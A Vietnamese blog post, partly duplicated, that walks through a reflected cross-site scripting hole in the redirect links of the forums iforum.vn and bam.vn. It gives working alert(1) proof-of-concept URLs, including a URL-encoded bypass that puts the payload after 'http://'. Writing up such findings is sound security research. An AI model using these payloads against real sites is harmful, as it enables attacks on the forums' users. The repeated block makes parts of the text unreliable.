sau khi tôi mò lỗi ra một số drok để tìm lỗi xss trên các web dùng xenforo thì cũng thấy thêm một cái hay ho trên iforum cũng gần giống lỗi trên nhưng nó khác chút bây giowf mình sẽ phân tích nhé!
đầu tiên khi mình vào link chuyển trang của iforum
http://iforum.vn/link/?url=
thì mình nghĩ ngay tới XSS nhưng test kiểu gì nó cũng không bị lỗi
http://iforum.vn/link/?url=<script>alert(1);</script>
chả nhẽ admin đã fix nhưng mình xem mã nguồn và thấy đoạn mã nguồn sau
test thử link
http://iforum.vn/link/?url=http://<xxx>
thì thấy nó chỉ hiện chữ http:// nghĩa là đằng sau nó hoàn toàn có thể run được nếu để trong 1 thẻ đóng bởi 2 dấu <>
=> vul
http://iforum.vn/link/?url=http://%3Cscript%3Ealert%281%29;%3C/script%3E
vậy là song cái diễn đàn này rồi nhé :)
tương tự như vậy bam.vn
đầu tiên khi mình vào link chuyển trang của iforum
http://iforum.vn/link/?url=
thì mình nghĩ ngay tới XSS nhưng test kiểu gì nó cũng không bị lỗi
http://iforum.vn/link/?url=<script>alert(1);</script>
chả nhẽ admin đã fix nhưng mình xem mã nguồn và thấy đoạn mã nguồn sau
và thấy đoạn truy vấn xss nằm trong thuộc tính href nhưng sao test lại không lỗi?
<a href="<script>alert(1);</script>" class="GFNSkip" rel="nofollow"><script>alert(1);</script></a></p>
test thử link
http://iforum.vn/link/?url=http://<xxx>
thì thấy nó chỉ hiện chữ http:// nghĩa là đằng sau nó hoàn toàn có thể run được nếu để trong 1 thẻ đóng bởi 2 dấu <>
=> vul
http://iforum.vn/link/?url=http://%3Cscript%3Ealert%281%29;%3C/script%3E
vậy là song cái diễn đàn này rồi nhé :)
tương tự như vậy bam.vn
http://bam.vn/redirect/?url=http://%3Cscript%3Ealert%281%29;%3C/script%3E
0 Comments:
Đăng nhận xét